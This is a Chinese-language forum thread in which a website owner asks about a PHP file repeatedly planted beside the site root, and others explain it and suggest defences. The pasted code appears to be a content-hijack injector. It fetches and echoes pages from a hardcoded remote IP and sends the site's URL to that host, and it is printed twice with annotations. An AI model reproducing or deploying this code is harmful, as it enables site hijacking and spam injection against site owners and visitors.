我网站好像被黑了,总有个SB天天来我网站根目录放一个文件,打开后代码如下:
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("
Connection Error!
");
他把这个代码放到你根目录下,网站是不是访问不了?
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
我网站没异常(我还没发现异常)
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
上面我的描述有问题,这个文件不是放在更目录,是放在根目录的上一个目录,如图:
public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这SB隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?
$Remote_server."/index.html?host=".$host_name 这个地方他把你的网站地址传过去 不知道干什么了 ,代码在那个ip的服务器上面 看不到。。。。。猜不来他要干什么。。。。。
服务器 那方面的我不懂,等高手来把,
没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("
Connection Error!
");不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。
把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("
Connection Error!
");
不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。
把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹